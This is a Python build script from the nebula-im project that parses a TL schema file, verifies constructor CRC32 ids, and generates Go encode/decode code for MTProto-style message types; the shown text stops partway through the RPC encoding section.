#-*- coding: utf-8 -*-
#encoding=utf-8
'''
/*
* Copyright (c) 2017, https://github.com/nebula-im/nebula
* All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// 最后一步,flags检查
'''
import glob, re, binascii, os, sys
def txt_wrap_by(start_str, end, line):
start = line.find(start_str)
if start >= 0:
start += len(start_str)
end = line.find(end, start)
if end >= 0:
return line[start:end].strip()
input_file = ''
output_path = ''
next_output_path = False
for arg in sys.argv[1:]:
if next_output_path:
next_output_path = False
output_path = arg
elif arg == '-o':
next_output_path = True
elif re.match(r'^-o(.+)', arg):
output_path = arg[2:]
else:
input_file = arg
if input_file == '':
print('Input file required.')
sys.exit(1)
if output_path == '':
print('Output path required.')
sys.exit(1)
def to_proto_go_name(name):
name2 = name
if (name == 'udp_p2p'):
name2 = 'UdpP2P'
ss = name2.split("_")
for i in range(len(ss)):
s = ss[i]
if i!=0 and s[0:1].isupper():
ss[i] = '_' + s
else:
ss[i] = s[0:1].upper() + s[1:]
return ''.join(ss)
output_proto = output_path # + '/codec_schema.tl.pb.go'
# this is a map (key flags -> map (flag name -> flag bit))
# each key flag of parentFlags should be a subset of the value flag here
parentFlagsCheck = {};
layer = '';
funcs = 0
types = 0;
consts = 0
funcsNow = 0
enums = [];
funcsDict = {};
FuncsDict = {};
funcsList = [];
typesDict = {};
TypesDict = {};
typesList = [];
TypesList = [];
typesText = '';
creatorProxyText = '';
inlineMethods = '';
textSerializeInit = '';
textSerializeMethods = '';
classTypesTexts = '';
resClassTypesTexts = '';
resClassTypesTexts2 = '';
resClassTypesTexts3 = '';
classFuncsTexts = '';
registers = [];
registers.append(' int32(TLConstructor_CRC32_message2) : func() (TLObject) { return new(TLMessage2) },\n');
registers.append(' int32(TLConstructor_CRC32_msg_container) : func() (TLObject) { return new(TLMsgContainer) },\n');
registers.append(' int32(TLConstructor_CRC32_msg_copy) : func() (TLObject) { return new(TLMsgCopy) },\n');
registers.append(' int32(TLConstructor_CRC32_gzip_packed) : func() (TLObject) { return new(TLGzipPacked) },\n');
registers.append(' int32(TLConstructor_CRC32_rpc_result) : func() (TLObject) { return new(TLRpcResult) },\n');
with open(input_file) as f:
for line in f:
line=line.strip('\n')
layerline = re.match(r'// LAYER (\d+)', line)
if (layerline):
# 当前层
layer = 'const CURRENT_LAYER = ' + layerline.group(1);
nocomment = re.match(r'^(.*?)//', line)
if (nocomment):
line = nocomment.group(1);
if (re.match(r'\-\-\-functions\-\-\-', line)):
funcsNow = 1;
continue;
if (re.match(r'\-\-\-types\-\-\-', line)):
funcsNow = 0;
continue;
if (re.match(r'^\s*$', line)):
continue;
nametype = re.match(r'([a-zA-Z\.0-9_]+)#([0-9a-f]+)([^=]*)=\s*([a-zA-Z\.<>0-9_]+);', line);
if (not nametype):
# 特殊处理 vector#1cb5c415 {t:Type} # [ t ] = Vector t;
if (not re.match(r'vector#1cb5c415 \{t:Type\} # \[ t \] = Vector t;', line)):
print('Bad line found: ' + line);
continue;
# resPQ#05162463 nonce:int128 server_nonce:int128 pq:string server_public_key_fingerprints:Vector<long> = ResPQ;
# name为: resPQ
# contest.saveDeveloperInfo#9a5f6e95 vk_id:int name:string phone_number:string age:int city:string = Bool;
# name为: contest_saveDeveloperInfo
name = nametype.group(1);
nameInd = name.find('.');
if (nameInd >= 0):
Name = name[0:nameInd] + '_' + name[nameInd + 1:nameInd + 2].upper() + name[nameInd + 2:];
name = name.replace('.', '_');
else:
Name = name[0:1].upper() + name[1:];
# typeid为: 05162463
typeid = nametype.group(2);
# 去掉前面的0
while (len(typeid) > 0 and typeid[0] == '0'):
typeid = typeid[1:];
if (len(typeid) == 0):
typeid = '0';
typeid = '0x' + typeid;
cleanline = nametype.group(1) + nametype.group(3) + '= ' + nametype.group(4);
cleanline = re.sub(r' [a-zA-Z0-9_]+\:flags\.[0-9]+\?true', '', cleanline);
cleanline = cleanline.replace('<', ' ').replace('>', ' ').replace(' ', ' ');
cleanline = re.sub(r'^ ', '', cleanline);
cleanline = re.sub(r' $', '', cleanline);
cleanline = cleanline.replace(':bytes ', ':string ');
cleanline = cleanline.replace('?bytes ', '?string ');
cleanline = cleanline.replace('{', '');
cleanline = cleanline.replace('}', '');
# 通过cleanline计算出typeid并进行验证
countTypeId = binascii.crc32(binascii.a2b_qp(cleanline));
if (countTypeId < 0):
countTypeId += 2 ** 32;
countTypeId = '0x' + re.sub(r'^0x|L$', '', hex(countTypeId));
if (typeid != countTypeId):
print('Warning: counted ' + countTypeId + ' mismatch with provided ' + typeid + ' (' + cleanline + ')');
continue;
typeid = binascii.crc32(binascii.a2b_qp(cleanline));
# params为: nonce:int128 server_nonce:int128 pq:string server_public_key_fingerprints:Vector<long>
params = nametype.group(3);
# restype为: ResPQ
restype = nametype.group(4);
if (restype.find('<') >= 0):
# vector
templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', restype);
if (templ):
vectemplate = templ.group(2);
if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
# restype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
# restype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
restype = templ.group(1) + vectemplate.replace('.', '_') + '>';
# print('name: ' + name + ', object: ' + restype);
elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
if (vectemplate == 'int'):
vectemplate = 'int32_t';
elif (vectemplate == 'long'):
vectemplate = 'int64_t';
else:
vectemplate = 'std::string';
# restype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
# restype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
restype = templ.group(1) + vectemplate.replace('.', '_') + '>';
# print('name: ' + name + ', int/long/string: ' + restype);
else:
foundmeta = '';
for metatype in typesDict:
for typedata in typesDict[metatype]:
if (typedata[0] == vectemplate):
foundmeta = metatype;
break;
if (len(foundmeta) > 0):
break;
if (len(foundmeta) > 0):
# ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
ptype = templ.group(1) + foundmeta.replace('.', '_') + '>';
# print('name: ' + name + ', foundmeta: ' + ptype);
else:
print('Bad vector param: ' + vectemplate);
continue;
else:
print('Bad template type: ' + restype);
continue;
resType = restype.replace('.', '_');
# print('restype: ' + restype + ', resType: ' + resType);
if (restype.find('.') >= 0):
parts = re.match(r'([a-z]+)\.([A-Z][A-Za-z0-9<>\._]+)', restype)
if (parts):
restype = parts.group(1) + '_' + parts.group(2)[0:1].lower() + parts.group(2)[1:];
else:
print('Bad result type name with dot: ' + restype);
continue;
else:
if (re.match(r'^[A-Z]', restype)):
restype = restype[:1].lower() + restype[1:];
else:
print('Bad result type name: ' + restype);
continue;
# print('name: %s, typeid: %s, params: %s, resType: %s, restype: %s' %(name, typeid, params, resType, restype));
# 生成: REGISTER_TLOBJECT(TL_resPQ);
registers.append(' int32(TLConstructor_CRC32_' + name + ') : func() (TLObject) { return new(TL' + to_proto_go_name(name) + ') },\n');
# 参数处理
paramsList = params.strip().split(' ');
prms = {};
conditions = {}; # 条件: flags:# first_name:flags.0?string last_name:flags.1?string about:flags.2?string
trivialConditions = {}; # true type, allow_flashcall:flags.0?true
prmsList = [];
conditionsList = [];
isTemplate = hasFlags = hasTemplate = '';
for param in paramsList:
if (re.match(r'^\s*$', param)):
continue;
templ = re.match(r'^{([A-Za-z]+):Type}$', param); # vector#1cb5c415 {t:Type} # [ t ] = Vector t;
if (templ):
hasTemplate = templ.group(1);
# print('hasTemplate: ' + hasTemplate + ', in: ' + cleanline);
continue;
pnametype = re.match(r'([a-z_][a-z0-9_]*):([A-Za-z0-9<>\._]+|![a-zA-Z]+|\#|[a-z_][a-z0-9_]*\.[0-9]+\?[A-Za-z0-9<>\._]+)$', param);
if (not pnametype):
print('Bad param found: "' + param + '" in line: ' + line);
continue;
pname = pnametype.group(1); # 参数名
ptypewide = pnametype.group(2); # 参数类型
if (re.match(r'^!([a-zA-Z]+)$', ptypewide)):
if ('!' + hasTemplate == ptypewide):
# 模板类型
isTemplate = pname;
ptype = 'TQueryType';
# print('template param name: ' + pname + ', type: TQueryType');
else:
print('Bad template param name: "' + param + '" in line: ' + line);
continue;
elif (ptypewide == '#'):
# flags, 类似protobuf的optional字段
hasFlags = pname;
ptype = 'int32';
else:
ptype = ptypewide;
if (ptype.find('?') >= 0):
# flags.0?string
pmasktype = re.match(r'([a-z_][a-z0-9_]*)\.([0-9]+)\?([A-Za-z0-9<>\._]+)', ptype);
if (not pmasktype or pmasktype.group(1) != hasFlags):
print('Bad param found: "' + param + '" in line: ' + line);
continue;
ptype = pmasktype.group(3);
if (ptype.find('<') >= 0):
# inputMediaUploadedPhoto#630c9af1 flags:# file:InputFile caption:string stickers:flags.0?Vector<InputDocument> = InputMedia;
# print('flags\'s template type: ' + ptype);
templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', ptype);
if (templ):
vectemplate = templ.group(2);
if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
# ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
# ptype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
ptype = 'TLObjectVector<' + vectemplate.replace('.', '_') + '>';
elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
# ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
if (vectemplate == 'int'):
ptype = 'repeated int32';
# vectemplate = 'int32_t';
elif (vectemplate == 'long'):
ptype = 'repeated int64';
# vectemplate = 'int64_t';
else:
ptype = 'repeated int32 string';
# vectemplate = 'std::string';
# ptype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
else:
foundmeta = '';
for metatype in typesDict:
for typedata in typesDict[metatype]:
if (typedata[0] == vectemplate):
foundmeta = metatype;
break;
if (len(foundmeta) > 0):
break;
if (len(foundmeta) > 0):
# ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
ptype = 'std::vector<' + foundmeta.replace('.', '_') + '>';
print('foundmeta: ' + ptype);
else:
print('Bad vector param: ' + vectemplate);
continue;
else:
print('Bad template type: ' + ptype);
continue;
if (not pname in conditions):
conditionsList.append(pname);
conditions[pname] = pmasktype.group(2);
# print('condition: ' + pname + ' --> ' + pmasktype.group(2) + ', ' + ptype);
if (ptype == 'true'):
trivialConditions[pname] = 1;
elif (ptype.find('<') >= 0):
templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', ptype);
if (templ):
vectemplate = templ.group(2);
if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
# ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
# ptype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
ptype = 'TLObjectVector<' + vectemplate.replace('.', '_') + '>';
elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
# ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
if (vectemplate == 'int'):
ptype = 'repeated int32';
# vectemplate = 'int32_t';
elif (vectemplate == 'long'):
ptype = 'repeated int64';
# vectemplate = 'int64_t';
else:
ptype = 'repeated string';
# vectemplate = 'std::string';
# ptype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
else:
foundmeta = '';
for metatype in typesDict:
for typedata in typesDict[metatype]:
if (typedata[0] == vectemplate):
foundmeta = metatype;
break;
if (len(foundmeta) > 0):
break;
if (len(foundmeta) > 0):
# ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
ptype = 'std::vector<TL_' + vectemplate + '*>';
print('ptype: ' + ptype + ', metatype: ' + metatype + ', vectemplate: ' + vectemplate);
else:
print('Bad vector param: ' + vectemplate);
continue;
else:
print('Bad template type: ' + ptype);
continue;
prmsList.append(pname);
# prms[pname] = ptype.replace('.', '_');
ptype2 = ptype.replace('.', '_');
if (ptype2 == 'true'):
ptype2 = 'bool';
if (ptype2 == 'int'):
ptype2 = 'int32';
if (ptype2 == 'long'):
ptype2 = 'int64';
if (ptype2 == 'int128'):
ptype2 = 'int128';
if (ptype2 == 'int256'):
ptype2 = 'int256';
if (ptype2 == 'string'):
ptype2 = 'string';
if (ptype2 == 'bytes'):
ptype2 = 'bytes';
prms[pname] = ptype2;
# print(prms);
if (isTemplate == '' and resType == 'X'):
print('Bad response type "X" in "' + name +'" in line: ' + line);
continue;
if funcsNow:
if (not restype in funcsDict):
funcsList.append(restype);
funcsDict[restype] = [];
# TypesDict[restype] = resType;
FuncsDict[restype] = resType;
funcsDict[restype].append([name, typeid, prmsList, prms, hasFlags, conditionsList, conditions, trivialConditions, line]);
# print(funcsDict[restype])
else:
if (isTemplate != ''):
print('Template types not allowed: "' + resType + '" in line: ' + line);
continue;
if (not restype in typesDict):
typesList.append(restype);
TypesList.append(resType);
# print('typeList added: ' + restype);
typesDict[restype] = [];
TypesDict[restype] = resType;
typesDict[restype].append([name, typeid, prmsList, prms, hasFlags, conditionsList, conditions, trivialConditions, line]);
consts = consts + 1;
# print(TypesDict[restype])
for restype in typesList:
v = typesDict[restype];
resType = TypesDict[restype];
# print('restype:' + restype + ', resType: ' + resType);
withData = 0;
creatorsText = '';
constructsText = '';
constructsInline = '';
withType = (len(v) > 1);
switchLines = '';
friendDecl = '';
getters = '';
reader = '';
writer = '';
sizeList = [];
sizeFast = '';
newFast = '';
sizeCases = '';
# print(v)
resClassTypesTexts2 = ''
resClassTypesTexts3 = ''
resClassTypesTexts += 'func (m *' + to_proto_go_name(resType) + ') Encode() (b []byte) {\n'
resClassTypesTexts += ' b = nil\n'
resClassTypesTexts += ' switch m.Payload.(type) {\n';
resClassTypesTexts2 += 'func (m *' + to_proto_go_name(resType) + ') Decode(dbuf *DecodeBuf) error {\n'
resClassTypesTexts2 += ' classId := dbuf.Int()\n'
resClassTypesTexts2 += ' switch classId {\n'
resClassTypesTexts3 += 'func Make' + to_proto_go_name(resType) + '(message proto.Message) (m *' + to_proto_go_name(resType) + ') {\n'
resClassTypesTexts3 += ' switch message.(type) {\n'
#### resClassTypesTexts += ' oneof payload {\n';
ij = 1;
for data in v:
name = data[0];
typeid = data[1];
prmsList = data[2];
prms = data[3];
hasFlags = data[4];
conditionsList = data[5];
conditions = data[6];
trivialConditions = data[7];
line = data[8]
classTypesTexts += '// ' + line + '\n';
classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') To' + to_proto_go_name(resType) + '() (*' + to_proto_go_name(resType) + ') {\n'
classTypesTexts += ' return &' + to_proto_go_name(resType) + '{\n';
classTypesTexts += ' Payload: &' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{\n'
# classTypesTexts += ' ' + to_proto_go_name(name) + ': &TL' + to_proto_go_name(name) + '{}, \n'
classTypesTexts += ' ' + to_proto_go_name(name) + ': m, \n'
classTypesTexts += ' },\n'
classTypesTexts += ' }\n'
classTypesTexts += '}\n\n'
# classTypesTexts += 'message Z' + name + ' : public ' + resType + ' {\n'; # type class declaration
classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Encode() []byte {\n'; # type class declaration
classTypesTexts += ' x := NewEncodeBuf(512)\n'; # type class declaration
classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
#### resClassTypesTexts += ' TL_' + name + ' ' + name + ' = ' + str(ij) + ';\n'
resClassTypesTexts += ' case *' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) +':\n'
resClassTypesTexts += ' m2, _ := m.Payload.(*' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + ')\n'
resClassTypesTexts += ' b = m2.' + to_proto_go_name(name) + '.Encode()\n'
resClassTypesTexts2 += ' case int32(TLConstructor_CRC32_' + name + '):\n'
resClassTypesTexts2 += ' m2 := ' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{}\n'
resClassTypesTexts2 += ' m2.' + to_proto_go_name(name) + ' = &TL' + to_proto_go_name(name) + '{}\n'
resClassTypesTexts2 += ' m2.' + to_proto_go_name(name) + '.Decode(dbuf)\n'
resClassTypesTexts2 += ' m.Payload = &m2\n'
resClassTypesTexts3 += ' case *TL' + to_proto_go_name(name) +':\n'
resClassTypesTexts3 += ' m2, _ := message.(*TL' + to_proto_go_name(name) + ')\n'
resClassTypesTexts3 += ' m = &' + to_proto_go_name(resType) + '{\n'
resClassTypesTexts3 += ' Payload: &' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{\n'
resClassTypesTexts3 += ' ' + to_proto_go_name(name) + ': m2,\n'
resClassTypesTexts3 += ' },\n'
resClassTypesTexts3 += ' }\n'
ij += 1;
ii = 1;
if (hasFlags):
classTypesTexts += '\n var flags uint32 = 0\n';
## Encode()
for paramName in prmsList:
paramType = prms[paramName];
if (paramName in conditionsList):
if (paramType in ['bool']):
# print ' if m.' + to_proto_go_name(paramName) + ' == true {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' == true {\n';
elif (paramType in ['int32', 'int64']):
#print ' if m.' + to_proto_go_name(paramName) + ' != 0 {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != 0 {\n';
elif (paramType in ['string']):
#print ' if m.' + to_proto_go_name(paramName) + ' != "" {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != "" {\n';
else:
#print ' if m.' + to_proto_go_name(paramName) + ' != nil {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != nil {\n';
classTypesTexts += ' flags |= 1<<' + conditions[paramName] + '\n';
classTypesTexts += ' }\n';
if (hasFlags):
classTypesTexts += ' x.UInt(flags)\n\n'
for paramName in prmsList:
if (paramName == 'flags'):
continue;
paramType = prms[paramName];
if (paramName in conditionsList):
classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
if (paramType == 'bool'):
classTypesTexts += ' // ignore\n';
# classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
elif (paramType =='int32'):
classTypesTexts += ' x.Int(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int64'):
classTypesTexts += ' x.Long(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'double'):
classTypesTexts += ' x.Double(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'string'):
classTypesTexts += ' x.String(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int128'):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int256'):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'bytes'):
classTypesTexts += ' x.StringBytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'repeated int32'):
classTypesTexts += ' x.VectorInt(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'repeated int64'):
classTypesTexts += ' x.VectorLong(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'repeated string'):
classTypesTexts += ' x.VectorString(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType in TypesList):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
elif (paramType.find('std::vector') >= 0):
eptype = txt_wrap_by('<', '*', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
classTypesTexts += ' }\n'
elif (paramType.find('TLObjectVector') >= 0):
eptype = txt_wrap_by('<', '>', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_vector))\n'
classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
classTypesTexts += ' }\n'
else:
# classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
if (paramName in conditionsList):
classTypesTexts += ' }\n';
ii += 1;
classTypesTexts += ' return x.buf\n'
classTypesTexts += '}\n\n';
## Decode()
# classTypesTexts += 'message Z' + name + ' : public ' + resType + ' {\n'; # type class declaration
classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Decode(dbuf *DecodeBuf) error {\n'; # type class declaration
# classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
ii = 1;
if (hasFlags):
classTypesTexts += ' flags := dbuf.UInt()\n'
if (name=='messages_channelMessages'):
classTypesTexts += ' if flags != 0 {}\n'
for paramName in prmsList:
if (paramName == 'flags'):
continue;
paramType = prms[paramName];
if (paramName in conditionsList):
classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
if (paramType == 'bool'):
if (paramName in conditionsList):
# classTypesTexts += '';
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = true\n';
# classTypesTexts += ' bool ' + paramName + ' = ' + str(ii) + ';\n';
elif (paramType =='int32'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Int()\n';
elif (paramType == 'int64'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Long()\n';
elif (paramType == 'double'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Double()\n';
elif (paramType == 'int128'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(16)\n';
elif (paramType == 'int256'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(32)\n';
elif (paramType == 'string'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.String()\n';
elif (paramType == 'bytes'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.StringBytes()\n';
elif (paramType == 'repeated int32'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorInt()\n';
elif (paramType == 'repeated int64'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorLong()\n';
elif (paramType == 'repeated string'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorString()\n';
elif (paramType in TypesList):
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = &' + to_proto_go_name(paramType) + '{}\n';
classTypesTexts += ' (*m.' + to_proto_go_name(paramName) + ').Decode(dbuf)\n';
elif (paramType.find('std::vector') >= 0):
eptype = txt_wrap_by('<', '*', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
classTypesTexts += ' // c%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' // if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
classTypesTexts += ' // return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
classTypesTexts += ' // }\n'
classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
if (eptype in TypesList):
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
else:
classTypesTexts += ' dbuf.Int()\n'
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' }\n'
elif (paramType.find('TLObjectVector') >= 0):
eptype = txt_wrap_by('<', '>', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
classTypesTexts += ' return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
classTypesTexts += ' }\n'
classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
if (eptype in TypesList):
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
else:
classTypesTexts += ' dbuf.Int()\n'
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' }\n'
else:
# classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' // other!!!! x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
if (paramName in conditionsList):
classTypesTexts += ' }\n';
ii += 1;
classTypesTexts += ' return dbuf.err\n'
classTypesTexts += '}\n\n';
resClassTypesTexts += ' }\n'
resClassTypesTexts += ' return\n'
resClassTypesTexts += '}\n\n';
resClassTypesTexts2 += ' }\n'
resClassTypesTexts2 += ' return dbuf.err\n'
resClassTypesTexts2 += '}\n\n'
resClassTypesTexts3 += ' }\n'
resClassTypesTexts3 += ' return\n'
resClassTypesTexts3 += '}\n\n'
resClassTypesTexts = resClassTypesTexts + resClassTypesTexts2 + resClassTypesTexts3
classTypesTexts += '\n// RPC\n';
for restype in funcsList:
v = funcsDict[restype];
for data in v:
name = data[0];
typeid = data[1];
prmsList = data[2];
prms = data[3];
hasFlags = data[4];
conditionsList = data[5];
conditions = data[6];
trivialConditions = data[7];
line = data[8]
classTypesTexts += '// ' + line + '\n'; # type class declaration
classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Encode() []byte {\n'; # type class declaration
classTypesTexts += ' x := NewEncodeBuf(512)\n'; # type class declaration
classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
ii = 1;
if (hasFlags):
classTypesTexts += '\n var flags uint32 = 0\n';
for paramName in prmsList:
paramType = prms[paramName];
if (paramName in conditionsList):
if (paramType in ['bool']):
#print ' if m.' + to_proto_go_name(paramName) + ' == true {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' == true {\n';
elif (paramType in ['int32', 'int64']):
#print ' if m.' + to_proto_go_name(paramName) + ' != 0 {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != 0 {\n';
elif (paramType in ['string']):
#print ' if m.' + to_proto_go_name(paramName) + ' != "" {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != "" {\n';
else:
#print ' if m.' + to_proto_go_name(paramName) + ' != nil {'
classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != nil {\n';
classTypesTexts += ' flags |= 1<<' + conditions[paramName] + '\n';
classTypesTexts += ' }\n';
if (hasFlags):
classTypesTexts += ' x.UInt(flags)\n\n'
for paramName in prmsList:
if (paramName == 'flags'):
continue;
paramType = prms[paramName];
if (paramName in conditionsList):
classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
if (paramType == 'bool'):
if (paramName in conditionsList):
# classTypesTexts += '';
classTypesTexts += ' // m.' + to_proto_go_name(paramName) + ' = true\n';
elif (paramType =='int32'):
classTypesTexts += ' x.Int(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int64'):
classTypesTexts += ' x.Long(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'double'):
classTypesTexts += ' x.Double(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int128'):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'int256'):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'string'):
classTypesTexts += ' x.String(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'bytes'):
classTypesTexts += ' x.StringBytes(m.' + to_proto_go_name(paramName) + ')\n';
